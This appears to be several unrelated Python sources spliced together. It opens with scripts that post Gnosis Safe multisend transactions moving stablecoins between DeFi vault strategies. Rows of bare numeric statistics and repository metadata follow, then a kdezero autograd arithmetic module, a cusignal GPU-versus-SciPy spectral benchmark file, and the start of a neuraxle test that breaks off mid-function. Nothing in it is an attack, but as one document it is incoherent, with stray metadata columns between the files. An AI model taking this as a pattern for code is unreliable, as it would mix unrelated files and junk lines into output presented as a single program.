safe_tx = safe.multisend_from_receipts([history[-3], history[-2], history[-1]], safe_nonce=54)
safe.sign_with_frame(safe_tx)
safe.post_transaction(safe_tx)
#3
from world import *
from ape_safe import ApeSafe
safe = ApeSafe('0xF14BBdf064E3F67f51cd9BD646aE3716aD938FDC')
show_vault_holdings()
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0xb3d3d37e')
strategist.transfer(to=vault_core, data='0x7fe2d3930000000000000000000000009c459eeb3fa179a40329b81c1635525e9a0ef094000000000000000000000000ea2ef2e2e5a749d4a66b41db9ad85a38aa264cb3000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000000000001000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb480000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000009184e72a000')
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0x2cd47c230000000000000000000000000000000000000000000000a2a15d09519be00000')
show_vault_holdings()
safe_tx = safe.multisend_from_receipts([history[-3], history[-2], history[-1]], safe_nonce=55)
safe.sign_with_frame(safe_tx)
safe.post_transaction(safe_tx)
#4
from world import *
from ape_safe import ApeSafe
safe = ApeSafe('0xF14BBdf064E3F67f51cd9BD646aE3716aD938FDC')
show_vault_holdings()
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0xb3d3d37e')
strategist.transfer(to=vault_core, data='0x7fe2d3930000000000000000000000009c459eeb3fa179a40329b81c1635525e9a0ef094000000000000000000000000ea2ef2e2e5a749d4a66b41db9ad85a38aa264cb3000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000000000001000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb480000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000012309ce54000')
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0x2cd47c2300000000000000000000000000000000000000000000014542ba12a337c00000')
show_vault_holdings()
safe_tx = safe.multisend_from_receipts([history[-3], history[-2], history[-1]], safe_nonce=56)
safe.sign_with_frame(safe_tx)
safe.post_transaction(safe_tx)
#5
from world import *
from ape_safe import ApeSafe
safe = ApeSafe('0xF14BBdf064E3F67f51cd9BD646aE3716aD938FDC')
show_vault_holdings()
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0xb3d3d37e')
strategist.transfer(to=vault_core, data='0x7fe2d3930000000000000000000000009c459eeb3fa179a40329b81c1635525e9a0ef094000000000000000000000000ea2ef2e2e5a749d4a66b41db9ad85a38aa264cb3000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000000000001000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb48000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000001b48eb57e000')
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0x2cd47c230000000000000000000000000000000000000000000001e7e4171bf4d3a00000')
show_vault_holdings()
safe_tx = safe.multisend_from_receipts([history[-3], history[-2], history[-1]], safe_nonce=57)
safe.sign_with_frame(safe_tx)
safe.post_transaction(safe_tx)
#6
from world import *
from ape_safe import ApeSafe
safe = ApeSafe('0xF14BBdf064E3F67f51cd9BD646aE3716aD938FDC')
show_vault_holdings()
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0xb3d3d37e')
strategist.transfer(to=vault_core, data='0x7fe2d3930000000000000000000000009c459eeb3fa179a40329b81c1635525e9a0ef094000000000000000000000000ea2ef2e2e5a749d4a66b41db9ad85a38aa264cb3000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000000000001000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb48000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000002d79883d2000')
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0x2cd47c2300000000000000000000000000000000000000000000032d26d12e980b600000')
show_vault_holdings()
safe_tx = safe.multisend_from_receipts([history[-3], history[-2], history[-1]], safe_nonce=58)
safe.sign_with_frame(safe_tx)
safe.post_transaction(safe_tx)
# --------------------------------
# DEC 24, 2021
#
# I'm thinking of batching this into three transactions. We can run one per day (Sat, Sun, Mon):
# 1. Move 17.4 million DAI from AAVE.
# 2. Move 12.5 million DAI and 15.7 million USDC from Compound
# 3. Move 28.1 million USDC from Compound
# 17.4 + (12.5 + 15.7) + 28.1 = 73.7
# 1. Move 17.4 million DAI from AAVE to Convex
# Targeting 4570 loss. 5600 max loss
from world import *
from ape_safe import ApeSafe
safe = ApeSafe('0xF14BBdf064E3F67f51cd9BD646aE3716aD938FDC')
show_vault_holdings()
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0xb3d3d37e')
strategist.transfer(to=vault_core, data='0x7fe2d3930000000000000000000000005e3646a1db86993f73e6b74a57d8640b69f7e259000000000000000000000000ea2ef2e2e5a749d4a66b41db9ad85a38aa264cb3000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c000000000000000000000000000000000000000000000000000000000000000010000000000000000000000006b175474e89094c44da98b954eedeac495271d0f00000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000e6497e3db20f38b000000')
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0x2cd47c2300000000000000000000000000000000000000000000012f939c99edab800000')
show_vault_holdings()
safe_tx = safe.multisend_from_receipts([history[-3], history[-2], history[-1]], safe_nonce=61)
safe.sign_with_frame(safe_tx)
r = safe.post_transaction(safe_tx)
# 2. Move 12.5 million DAI and 15.7 million USDC from Compound
# Targeting 4458 loss. 5600 max loss
from world import *
from ape_safe import ApeSafe
safe = ApeSafe('0xF14BBdf064E3F67f51cd9BD646aE3716aD938FDC')
show_vault_holdings()
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0xb3d3d37e')
strategist.transfer(to=vault_core, data='0x7fe2d3930000000000000000000000009c459eeb3fa179a40329b81c1635525e9a0ef094000000000000000000000000ea2ef2e2e5a749d4a66b41db9ad85a38aa264cb3000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000e000000000000000000000000000000000000000000000000000000000000000020000000000000000000000006b175474e89094c44da98b954eedeac495271d0f000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4800000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000a56fa5b99019a5c80000000000000000000000000000000000000000000000000000000000e4770ec4800')
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0x2cd47c2300000000000000000000000000000000000000000000012f939c99edab800000')
show_vault_holdings()
safe_tx = safe.multisend_from_receipts([history[-3], history[-2], history[-1]], safe_nonce=62)
safe.sign_with_frame(safe_tx)
r = safe.post_transaction(safe_tx)
# 3. Move 28.1 million USDC from Compound
# Targeting: 6795, max loss: 7800
from world import *
from ape_safe import ApeSafe
safe = ApeSafe('0xF14BBdf064E3F67f51cd9BD646aE3716aD938FDC')
show_vault_holdings()
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0xb3d3d37e')
strategist.transfer(to=vault_core, data='0x7fe2d3930000000000000000000000009c459eeb3fa179a40329b81c1635525e9a0ef094000000000000000000000000ea2ef2e2e5a749d4a66b41db9ad85a38aa264cb3000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000000000001000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb4800000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000198e8a84a800')
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0x2cd47c230000000000000000000000000000000000000000000001a6d6beb1d42ee00000')
show_vault_holdings()
safe_tx = safe.multisend_from_receipts([history[-3], history[-2], history[-1]], safe_nonce=63)
safe.sign_with_frame(safe_tx)
r = safe.post_transaction(safe_tx)
| 76.0625
| 1,290
| 0.90924
| 678
| 13,387
| 17.753687
| 0.154867
| 0.040376
| 0.044862
| 0.092714
| 0.429509
| 0.400598
| 0.400432
| 0.400432
| 0.390961
| 0.390961
| 0
| 0.616458
| 0.041383
| 13,387
| 176
| 1,291
| 76.0625
| 0.321515
| 0.042504
| 0
| 0.752475
| 0
| 0
| 0.524728
| 0.517697
| 0
| 1
| 0.626299
| 0
| 0
| 0
| null | null | 0
| 0.178218
| null | null | 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| null | 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
e2c3fcad137cf82b70d30ea2db27be8a866c1f2a
| 2,655
|
py
|
Python
|
kdezero/functions/basic_calc_functions.py
|
kotabrog/K_DeZero
|
e8145a539874956bc235d4577fa38211c01c30ea
|
[
"MIT"
] | null | null | null |
kdezero/functions/basic_calc_functions.py
|
kotabrog/K_DeZero
|
e8145a539874956bc235d4577fa38211c01c30ea
|
[
"MIT"
] | null | null | null |
kdezero/functions/basic_calc_functions.py
|
kotabrog/K_DeZero
|
e8145a539874956bc235d4577fa38211c01c30ea
|
[
"MIT"
] | null | null | null |
import kdezero
from kdezero import Function
from kdezero import as_array
class Add(Function):
def forward(self, x0, x1):
self.x0_shape, self.x1_shape = x0.shape, x1.shape
y = x0 + x1
return y
def backward(self, gy):
gx0, gx1 = gy, gy
if self.x0_shape != self.x1_shape:
gx0 = kdezero.functions.sum_to(gx0, self.x0_shape)
gx1 = kdezero.functions.sum_to(gx1, self.x1_shape)
return gx0, gx1
def add(x0, x1):
x1 = as_array(x1, kdezero.cuda.get_array_module(x0.data))
return Add()(x0, x1)
class Mul(Function):
def forward(self, x0, x1):
return x0 * x1
def backward(self, gy):
x0, x1 = self.inputs
gx0 = gy * x1
gx1 = gy * x0
if x0.shape != x1.shape:
gx0 = kdezero.functions.sum_to(gx0, x0.shape)
gx1 = kdezero.functions.sum_to(gx1, x1.shape)
return gx0, gx1
def mul(x0, x1):
x1 = as_array(x1, kdezero.cuda.get_array_module(x0.data))
return Mul()(x0, x1)
class Neg(Function):
def forward(self, x):
return -x
def backward(self, gy):
return -gy
def neg(x):
return Neg()(x)
class Sub(Function):
def forward(self, x0, x1):
self.x0_shape, self.x1_shape = x0.shape, x1.shape
return x0 - x1
def backward(self, gy):
gx0 = gy
gx1 = -gy
if self.x0_shape != self.x1_shape:
gx0 = kdezero.functions.sum_to(gx0, self.x0_shape)
gx1 = kdezero.functions.sum_to(gx1, self.x1_shape)
return gx0, gx1
def sub(x0, x1):
x1 = as_array(x1, kdezero.cuda.get_array_module(x0.data))
return Sub()(x0, x1)
def rsub(x0, x1):
x1 = as_array(x1, kdezero.cuda.get_array_module(x0.data))
return Sub()(x1, x0)
class Div(Function):
def forward(self, x0, x1):
return x0 / x1
def backward(self, gy):
x0, x1 = self.inputs
gx0 = gy / x1
gx1 = gy * (-x0 / x1 ** 2)
if x0.shape != x1.shape:
gx0 = kdezero.functions.sum_to(gx0, x0.shape)
gx1 = kdezero.functions.sum_to(gx1, x1.shape)
return gx0, gx1
def div(x0, x1):
x1 = as_array(x1, kdezero.cuda.get_array_module(x0.data))
return Div()(x0, x1)
def rdiv(x0, x1):
x1 = as_array(x1, kdezero.cuda.get_array_module(x0.data))
return Div()(x1, x0)
class Pow(Function):
def __init__(self, c):
self.c = c
def forward(self, x):
return x ** self.c
def backward(self, gy):
x = self.inputs[0]
c = self.c
gx = c * x ** (c - 1) * gy
return gx
def pow(x, c):
return Pow(c)(x)
| 22.125
| 62
| 0.572881
| 407
| 2,655
| 3.63145
| 0.105651
| 0.056834
| 0.102842
| 0.113667
| 0.768606
| 0.753045
| 0.723275
| 0.705007
| 0.705007
| 0.705007
| 0
| 0.067597
| 0.297928
| 2,655
| 119
| 63
| 22.310924
| 0.725322
| 0
| 0
| 0.452381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.035714
| 0.083333
| 0.595238
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
39148d52ba2982161a8a733d3c5526b1346d4f9d
| 14,609
|
py
|
Python
|
python/cusignal/benchmark/bench_spectral.py
|
efajardo-nv/cusignal
|
9949e1d3f0964ec06c376600eb4335a0980c1bb8
|
[
"Apache-2.0"
] | null | null | null |
python/cusignal/benchmark/bench_spectral.py
|
efajardo-nv/cusignal
|
9949e1d3f0964ec06c376600eb4335a0980c1bb8
|
[
"Apache-2.0"
] | null | null | null |
python/cusignal/benchmark/bench_spectral.py
|
efajardo-nv/cusignal
|
9949e1d3f0964ec06c376600eb4335a0980c1bb8
|
[
"Apache-2.0"
] | 3
|
2020-08-06T12:31:46.000Z
|
2022-02-24T22:30:45.000Z
|
# Copyright (c) 2019-2020, NVIDIA CORPORATION.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import cupy as cp
import numpy as np
from cusignal.test.utils import array_equal
import cusignal
from scipy import signal
@pytest.mark.benchmark(group="CSD")
@pytest.mark.parametrize("num_samps", [2 ** 14])
@pytest.mark.parametrize("fs", [1.0, 1e6])
@pytest.mark.parametrize("nperseg", [1024, 2048])
# Bench is required in class name for the test to be active
class BenchCSD:
# This function will ensure the GPU version is getting the correct answer
def cpu_version(self, cpu_x, cpu_y, fs, nperseg):
return signal.csd(cpu_x, cpu_y, fs, nperseg=nperseg)
# bench_ is required in function name to be searchable with -k parameter
def bench_csd_cpu(self, rand_data_gen, benchmark, num_samps, fs, nperseg):
cpu_x, _ = rand_data_gen(num_samps)
cpu_y, _ = rand_data_gen(num_samps)
benchmark(self.cpu_version, cpu_x, cpu_y, fs, nperseg)
def bench_csd_gpu(self, rand_data_gen, benchmark, num_samps, fs, nperseg):
cpu_x, gpu_x = rand_data_gen(num_samps)
cpu_y, gpu_y = rand_data_gen(num_samps)
# Variable output holds result from final cusignal.resample
# It is not copied back until assert to so timing is not impacted
_, output = benchmark(cusignal.csd, gpu_x, gpu_y, fs, nperseg=nperseg)
_, key = self.cpu_version(cpu_x, cpu_y, fs, nperseg)
assert array_equal(cp.asnumpy(output), key)
@pytest.mark.benchmark(group="CSDComplex")
@pytest.mark.parametrize("num_samps", [2 ** 14])
@pytest.mark.parametrize("fs", [1.0, 1e6])
@pytest.mark.parametrize("nperseg", [1024, 2048])
class BenchCSDComplex:
def cpu_version(self, cpu_x, cpu_y, fs, nperseg):
return signal.csd(cpu_x, cpu_y, fs, nperseg=nperseg)
def bench_csd_complex_cpu(
self, rand_complex_data_gen, benchmark, num_samps, fs, nperseg
):
cpu_x, _ = rand_complex_data_gen(num_samps)
cpu_y, _ = rand_complex_data_gen(num_samps)
benchmark(self.cpu_version, cpu_x, cpu_y, fs, nperseg)
def bench_csd_complex_gpu(
self, rand_complex_data_gen, benchmark, num_samps, fs, nperseg
):
cpu_x, gpu_x = rand_complex_data_gen(num_samps)
cpu_y, gpu_y = rand_complex_data_gen(num_samps)
_, output = benchmark(cusignal.csd, gpu_x, gpu_y, fs, nperseg=nperseg)
_, key = self.cpu_version(cpu_x, cpu_y, fs, nperseg)
assert array_equal(cp.asnumpy(output), key)
@pytest.mark.benchmark(group="Periodogram")
@pytest.mark.parametrize("num_samps", [2 ** 14])
@pytest.mark.parametrize("fs", [1.0, 1e6])
@pytest.mark.parametrize("window", ["flattop", "nuttall"])
@pytest.mark.parametrize("scaling", ["spectrum", "density"])
class BenchPeriodogram:
def cpu_version(self, cpu_sig, fs, window, scaling):
return signal.periodogram(cpu_sig, fs, window=window, scaling=scaling)
def bench_periodogram_cpu(
self, rand_data_gen, benchmark, num_samps, fs, window, scaling
):
cpu_sig, _ = rand_data_gen(num_samps)
benchmark(self.cpu_version, cpu_sig, fs, window, scaling)
def bench_periodogram_gpu(
self, rand_data_gen, benchmark, num_samps, fs, window, scaling
):
cpu_sig, gpu_sig = rand_data_gen(num_samps)
_, output = benchmark(
cusignal.periodogram, gpu_sig, fs, window=window, scaling=scaling
)
_, key = self.cpu_version(cpu_sig, fs, window, scaling)
assert array_equal(cp.asnumpy(output), key)
@pytest.mark.benchmark(group="PeriodogramComplex")
@pytest.mark.parametrize("num_samps", [2 ** 14])
@pytest.mark.parametrize("fs", [1.0, 1e6])
@pytest.mark.parametrize("window", ["flattop", "nuttall"])
@pytest.mark.parametrize("scaling", ["spectrum", "density"])
class BenchPeriodogramComplex:
def cpu_version(self, cpu_sig, fs, window, scaling):
return signal.periodogram(cpu_sig, fs, window=window, scaling=scaling)
def bench_periodogram_complex_cpu(
self, rand_complex_data_gen, benchmark, num_samps, fs, window, scaling
):
cpu_sig, _ = rand_complex_data_gen(num_samps)
benchmark(self.cpu_version, cpu_sig, fs, window, scaling)
def bench_periodogram_complex_gpu(
self, rand_complex_data_gen, benchmark, num_samps, fs, window, scaling
):
cpu_sig, gpu_sig = rand_complex_data_gen(num_samps)
_, output = benchmark(
cusignal.periodogram, gpu_sig, fs, window=window, scaling=scaling
)
_, key = self.cpu_version(cpu_sig, fs, window, scaling)
assert array_equal(cp.asnumpy(output), key)
@pytest.mark.benchmark(group="Welch")
@pytest.mark.parametrize("num_samps", [2 ** 14])
@pytest.mark.parametrize("fs", [1.0, 1e6])
@pytest.mark.parametrize("nperseg", [1024, 2048])
class BenchWelch:
def cpu_version(self, cpu_sig, fs, nperseg):
return signal.welch(cpu_sig, fs, nperseg=nperseg)
def bench_welch_cpu(
self, rand_data_gen, benchmark, num_samps, fs, nperseg
):
cpu_sig, _ = rand_data_gen(num_samps)
benchmark(self.cpu_version, cpu_sig, fs, nperseg)
def bench_welch_gpu(
self, rand_data_gen, benchmark, num_samps, fs, nperseg
):
cpu_sig, gpu_sig = rand_data_gen(num_samps)
_, output = benchmark(cusignal.welch, gpu_sig, fs, nperseg=nperseg)
_, key = self.cpu_version(cpu_sig, fs, nperseg)
assert array_equal(cp.asnumpy(output), key)
@pytest.mark.benchmark(group="WelchComplex")
@pytest.mark.parametrize("num_samps", [2 ** 14])
@pytest.mark.parametrize("fs", [1.0, 1e6])
@pytest.mark.parametrize("nperseg", [1024, 2048])
class BenchWelchComplex:
def cpu_version(self, cpu_sig, fs, nperseg):
return signal.welch(cpu_sig, fs, nperseg=nperseg)
def bench_welch_complex_cpu(
self, rand_complex_data_gen, benchmark, num_samps, fs, nperseg
):
cpu_sig, _ = rand_complex_data_gen(num_samps)
benchmark(self.cpu_version, cpu_sig, fs, nperseg)
def bench_welch_complex_gpu(
self, rand_complex_data_gen, benchmark, num_samps, fs, nperseg
):
cpu_sig, gpu_sig = rand_complex_data_gen(num_samps)
_, output = benchmark(cusignal.welch, gpu_sig, fs, nperseg=nperseg)
_, key = self.cpu_version(cpu_sig, fs, nperseg)
assert array_equal(cp.asnumpy(output), key)
@pytest.mark.benchmark(group="Spectrogram")
@pytest.mark.parametrize("num_samps", [2 ** 14])
@pytest.mark.parametrize("fs", [1.0, 1e6])
@pytest.mark.parametrize("nperseg", [1024, 2048])
class BenchSpectrogram:
def cpu_version(self, cpu_sig, fs, nperseg):
return signal.spectrogram(cpu_sig, fs, nperseg=nperseg)
def bench_spectrogram_cpu(
self, rand_data_gen, benchmark, num_samps, fs, nperseg
):
cpu_sig, _ = rand_data_gen(num_samps)
benchmark(self.cpu_version, cpu_sig, fs, nperseg)
def bench_spectrogram_gpu(
self, rand_data_gen, benchmark, num_samps, fs, nperseg
):
cpu_sig, gpu_sig = rand_data_gen(num_samps)
_, _, output = benchmark(
cusignal.spectrogram, gpu_sig, fs, nperseg=nperseg
)
_, _, key = self.cpu_version(cpu_sig, fs, nperseg)
assert array_equal(cp.asnumpy(output), key)
@pytest.mark.benchmark(group="SpectrogramComplex")
@pytest.mark.parametrize("num_samps", [2 ** 14])
@pytest.mark.parametrize("fs", [1.0, 1e6])
@pytest.mark.parametrize("nperseg", [1024, 2048])
class BenchSpectrogramComplex:
def cpu_version(self, cpu_sig, fs, nperseg):
return signal.spectrogram(cpu_sig, fs, nperseg=nperseg)
def bench_spectrogram_complex_cpu(
self, rand_complex_data_gen, benchmark, num_samps, fs, nperseg
):
cpu_sig, _ = rand_complex_data_gen(num_samps)
benchmark(self.cpu_version, cpu_sig, fs, nperseg)
def bench_spectrogram_complex_gpu(
self, rand_complex_data_gen, benchmark, num_samps, fs, nperseg
):
cpu_sig, gpu_sig = rand_complex_data_gen(num_samps)
_, _, output = benchmark(
cusignal.spectrogram, gpu_sig, fs, nperseg=nperseg
)
_, _, key = self.cpu_version(cpu_sig, fs, nperseg)
assert array_equal(cp.asnumpy(output), key)
@pytest.mark.benchmark(group="Coherence")
@pytest.mark.parametrize("num_samps", [2 ** 14])
@pytest.mark.parametrize("fs", [1.0, 1e6])
@pytest.mark.parametrize("nperseg", [1024, 2048])
class BenchCoherence:
def cpu_version(self, cpu_x, cpu_y, fs, nperseg):
return signal.coherence(cpu_x, cpu_y, fs, nperseg=nperseg)
def bench_coherence_cpu(
self, rand_data_gen, benchmark, num_samps, fs, nperseg
):
cpu_x, _ = rand_data_gen(num_samps)
cpu_y, _ = rand_data_gen(num_samps)
benchmark(self.cpu_version, cpu_x, cpu_y, fs, nperseg)
def bench_coherence_gpu(
self, rand_data_gen, benchmark, num_samps, fs, nperseg
):
cpu_x, gpu_x = rand_data_gen(num_samps)
cpu_y, gpu_y = rand_data_gen(num_samps)
_, output = benchmark(
cusignal.coherence, gpu_x, gpu_y, fs, nperseg=nperseg
)
_, key = self.cpu_version(cpu_x, cpu_y, fs, nperseg)
assert array_equal(cp.asnumpy(output), key)
@pytest.mark.benchmark(group="CoherenceComplex")
@pytest.mark.parametrize("num_samps", [2 ** 14])
@pytest.mark.parametrize("fs", [1.0, 1e6])
@pytest.mark.parametrize("nperseg", [1024, 2048])
class BenchCoherenceComplex:
def cpu_version(self, cpu_x, cpu_y, fs, nperseg):
return signal.coherence(cpu_x, cpu_y, fs, nperseg=nperseg)
def bench_coherence_complex_cpu(
self, rand_complex_data_gen, benchmark, num_samps, fs, nperseg
):
cpu_x, _ = rand_complex_data_gen(num_samps)
cpu_y, _ = rand_complex_data_gen(num_samps)
benchmark(self.cpu_version, cpu_x, cpu_y, fs, nperseg)
def bench_coherence_complex_gpu(
self, rand_complex_data_gen, benchmark, num_samps, fs, nperseg
):
cpu_x, gpu_x = rand_complex_data_gen(num_samps)
cpu_y, gpu_y = rand_complex_data_gen(num_samps)
_, output = benchmark(
cusignal.coherence, gpu_x, gpu_y, fs, nperseg=nperseg
)
_, key = self.cpu_version(cpu_x, cpu_y, fs, nperseg)
assert array_equal(cp.asnumpy(output), key)
@pytest.mark.benchmark(group="STFT")
@pytest.mark.parametrize("num_samps", [2 ** 14])
@pytest.mark.parametrize("fs", [1.0, 1e6])
@pytest.mark.parametrize("nperseg", [1024, 2048])
class BenchSTFT:
def cpu_version(self, cpu_sig, fs, nperseg):
return signal.stft(cpu_sig, fs, nperseg=nperseg)
def bench_stft_cpu(self, rand_data_gen, benchmark, num_samps, fs, nperseg):
cpu_sig, _ = rand_data_gen(num_samps)
benchmark(self.cpu_version, cpu_sig, fs, nperseg)
def bench_stft_gpu(self, rand_data_gen, benchmark, num_samps, fs, nperseg):
cpu_sig, gpu_sig = rand_data_gen(num_samps)
_, _, output = benchmark(cusignal.stft, gpu_sig, fs, nperseg=nperseg)
_, _, key = self.cpu_version(cpu_sig, fs, nperseg)
assert array_equal(cp.asnumpy(output), key)
@pytest.mark.benchmark(group="STFTComplex")
@pytest.mark.parametrize("num_samps", [2 ** 14])
@pytest.mark.parametrize("fs", [1.0, 1e6])
@pytest.mark.parametrize("nperseg", [1024, 2048])
class BenchSTFTComplex:
def cpu_version(self, cpu_sig, fs, nperseg):
return signal.stft(cpu_sig, fs, nperseg=nperseg)
def bench_stft_complex_cpu(
self, rand_complex_data_gen, benchmark, num_samps, fs, nperseg
):
cpu_sig, _ = rand_complex_data_gen(num_samps)
benchmark(self.cpu_version, cpu_sig, fs, nperseg)
def bench_stft_complex_gpu(
self, rand_complex_data_gen, benchmark, num_samps, fs, nperseg
):
cpu_sig, gpu_sig = rand_complex_data_gen(num_samps)
_, _, output = benchmark(cusignal.stft, gpu_sig, fs, nperseg=nperseg)
_, _, key = self.cpu_version(cpu_sig, fs, nperseg)
assert array_equal(cp.asnumpy(output), key)
@pytest.mark.benchmark(group="LombScargle")
@pytest.mark.parametrize("num_in_samps", [2 ** 10])
@pytest.mark.parametrize("num_out_samps", [2 ** 16, 2 ** 18])
@pytest.mark.parametrize("precenter", [True, False])
@pytest.mark.parametrize("normalize", [True, False])
class BenchLombScargle:
def cpu_version(self, x, y, f, precenter, normalize):
return signal.lombscargle(x, y, f, precenter, normalize)
def bench_lombscargle_cpu(
self,
linspace_data_gen,
rand_data_gen,
benchmark,
num_in_samps,
num_out_samps,
precenter,
normalize,
):
A = 2.0
w = 1.0
phi = 0.5 * np.pi
frac_points = 0.9 # Fraction of points to select
r, _ = rand_data_gen(num_in_samps)
x, _ = linspace_data_gen(0.01, 10 * np.pi, num_in_samps)
x = x[r >= frac_points]
y = A * np.sin(w * x + phi)
f, _ = linspace_data_gen(0.01, 10, num_out_samps)
benchmark(self.cpu_version, x, y, f, precenter, normalize)
@pytest.mark.parametrize("use_numba", [True, False])
def bench_lombscargle_gpu(
self,
linspace_data_gen,
rand_data_gen,
benchmark,
num_in_samps,
num_out_samps,
precenter,
normalize,
use_numba,
):
A = 2.0
w = 1.0
phi = 0.5 * np.pi
frac_points = 0.9 # Fraction of points to select
r, _ = rand_data_gen(num_in_samps)
x, _ = linspace_data_gen(0.01, 10 * np.pi, num_in_samps)
x = x[r >= frac_points]
y = A * np.sin(w * x + phi)
f, d_f = linspace_data_gen(0.01, 10, num_out_samps)
d_x = cp.asarray(x)
d_y = cp.asarray(y)
output = benchmark(
cusignal.lombscargle,
d_x,
d_y,
d_f,
precenter,
normalize,
use_numba=use_numba,
)
key = self.cpu_version(x, y, f, precenter, normalize)
assert array_equal(cp.asnumpy(output), key)
| 35.372881
| 79
| 0.673078
| 2,028
| 14,609
| 4.57002
| 0.094181
| 0.067976
| 0.097432
| 0.051791
| 0.827579
| 0.821752
| 0.821752
| 0.818084
| 0.810531
| 0.80902
| 0
| 0.019167
| 0.21076
| 14,609
| 412
| 80
| 35.458738
| 0.784649
| 0.064823
| 0
| 0.725806
| 0
| 0
| 0.034966
| 0
| 0
| 0
| 0
| 0
| 0.041935
| 1
| 0.125806
| false
| 0
| 0.019355
| 0.041935
| 0.229032
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
200a18d773d50199c7e74c241f4f612aa4cb4084
| 17,967
|
py
|
Python
|
testing/steps/test_choose_one_or_many_steps_of.py
|
Neuraxio/Neuraxle
|
0615701b781c948e4ec38fa61c6b3a5d8d72c147
|
[
"Apache-2.0"
] | 519
|
2019-03-29T19:17:41.000Z
|
2022-03-31T12:45:42.000Z
|
testing/steps/test_choose_one_or_many_steps_of.py
|
Neuraxio/Neuraxle
|
0615701b781c948e4ec38fa61c6b3a5d8d72c147
|
[
"Apache-2.0"
] | 401
|
2019-06-09T19:06:47.000Z
|
2022-03-31T14:00:12.000Z
|
testing/steps/test_choose_one_or_many_steps_of.py
|
Neuraxio/Neuraxle
|
0615701b781c948e4ec38fa61c6b3a5d8d72c147
|
[
"Apache-2.0"
] | 55
|
2019-06-09T19:24:31.000Z
|
2022-01-22T00:17:42.000Z
|
import numpy as np
import pytest
from neuraxle.base import Identity
from neuraxle.hyperparams.distributions import Boolean
from neuraxle.hyperparams.space import HyperparameterSpace
from neuraxle.pipeline import Pipeline
from neuraxle.steps.flow import ChooseOneOrManyStepsOf, ChooseOneStepOf
from neuraxle.steps.misc import TransformCallbackStep, TapeCallbackFunction, FitTransformCallbackStep
from testing.steps.neuraxle_test_case import NeuraxleTestCase
DATA_INPUTS = np.array(range(10))
EXPECTED_OUTPUTS = np.array(range(10))
def create_test_case_single_step_choosen():
a_callback = TapeCallbackFunction()
b_callback = TapeCallbackFunction()
return NeuraxleTestCase(
pipeline=Pipeline([
ChooseOneOrManyStepsOf([
('a', TransformCallbackStep(a_callback, transform_function=lambda di: di * 2)),
('b', TransformCallbackStep(b_callback, transform_function=lambda di: di * 2))
]),
]),
callbacks=[a_callback, b_callback],
